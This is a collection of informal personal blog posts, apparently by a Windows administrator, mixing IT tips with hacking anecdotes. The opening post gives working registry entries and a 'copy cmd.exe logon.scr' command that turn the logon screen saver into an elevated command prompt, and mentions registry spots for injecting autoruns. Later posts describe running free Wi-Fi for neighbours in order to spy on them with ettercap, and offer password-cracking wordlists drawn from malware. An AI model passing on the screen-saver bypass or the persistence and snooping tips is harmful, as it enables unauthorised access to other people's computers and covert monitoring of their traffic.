a simple trick to get elevated command line from the screen saver, there are many ways to enter this data one fast trick is to use a linux reg editor its simple as making the logon script the command window. also works to do a command line of “copy cmd.exe logon.scr” this will work anywhere  but on domain controllers not booted in recovery mode. This is preventable with PGP disk encryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

OEM data you changed

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"

in recent hackings I came across a few other locations that if smart you can inject autoruns

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

 

So I have never really liked wireless networks, also if I do have wireless I like to have free wireless. So today I spent 8 hours working on making a new wireless network with a captive portal. What is this you ask? You know when you use the wifi at a hotel it makes you agree to terms and conditions? and you cant browse until you accept them. thats the idea. I looked all over at like 15 solutions. Mainly the biggest being free, also that I didnt need to use services 3rd party and I didnt want it to be a windows application (dont want to use a loud computer) I happen to have a old firewall that the OS was corrupt on from work so I went to compusa and bought a CF card for 40% off. came home and installed my new os. I chose to go with http://www.pfsense.org/ its a spinoff of m0n0wall which is a very good firewall, however PFSence, has a better polish.

So after diggin out a old netgear I got it all hooked up, now I have port level fwd with packet shape and vlans, as well as a firewalled limited wifi with captive portal. way cool I now offer network service to my neighbors with the added cost of letting me spy on them. All ettercap I love you. The only interesting that I should add is im using a alpha build and its very buggy  but still works.

 

If you own a PC that the public can get to – laptop, library, corporate etc etc. Disable AutoPlay on the system via Group Policy. Do this to prevent hackers

• KB 555324
• KB 320182

 

i posted a while back about swearing at the automated caller menus, that works a lot. But if not here is a great site keep this handy when you call a major corporation - get a human caller list

when you just use your website and never look at the server that runs it. it will crash dump because its over used. and write gb's of data to your c drive to the point that windows wont run any more. then to make it more fun RDP wont have any room to cache data. so its basically a pain to get your server back on line. sorry.

I was browsing the FCC database today, the information in this database is insane. go look up a fcc ID today. Combined with the Patent Office search and you have all you need to hack things.

So I wanted to review the permissions of a group of calendars so that all team members can look at other’s clanadars. This is not only a hard task as a administrator to do individually but its also a pain for users, open click add add add. Most users dont understand permissions so they have no idea where or what to click. So I set out for a tool to mass edit calendar permissions.

I found one from Microsoft! This is a very powerful tool and not for goofing off, it is very powerful for public folders as well as private. Public Folder DAV Admin tool and steps that are “not approved” to edit the calendar permissions You can set the default permissions to review for example, this will allow a select or everyone to view everyones calendar, (not that big of a security risk since you can cheat and use free busy data to gather the same information) but it increases productivity for users to know what others calendars look like with the native views in outlook.

It will also do powerful admin tools for your public folders. Give you some interesting data as well. The Q article has one glitch it has steps for a older version of the DAV tool, go to tools menu in the tool for the calendar permissions setting. and log in with a domain admin that has exchange management over the server. My non domain admin user didn't work. (send-as has no barring on this tool)

I just noticed that i had porn on my website then i wondered what's up with that. For the first time in about 3 years i have been hit with a virus. Bad kelly.

google Trojan

 in all commical manner, I got this trojan because I got tired of IE7 security and turned it all off. say haha everyone.

Nothing will detect it yet (no data on the web at all to clean the virus) I did find it running with HiJackThis it had a DLL with the following information

"O2 - BHO: (no name) - {598F4775-6FB6-477B-9842-E0426824E077} - C:\DOCUME~1\KELLYK~1\LOCALS~1\Temp\~DP20.dll"

when that DLL is added or removed the porn will come back. However the trojan appears to still be effecting my computer or a file on my computer is infected, fun.

Found a cool site http://www.virustotal.com it will scan files with all engines, looks like that is just a adware file. how did it get there?!

Patch To Prevent it MS06–001

 

I can never find a common password and user name dictionary, so I created my own. Simple trick I researched some viruses and pulled the list of user name and passwords they used. Easy. Found a list of the 100 most used passwords and converted them all to .txt files for use with john the ripper etc to create fuzz passwords with. I also went and pulled down the Default Device Password lists and converted them out to .txt files so that you can also have them in a list. So it made about 5 text files of passwords that look like a nice low hanging fruit to chomp. You can download my compilation from my blog.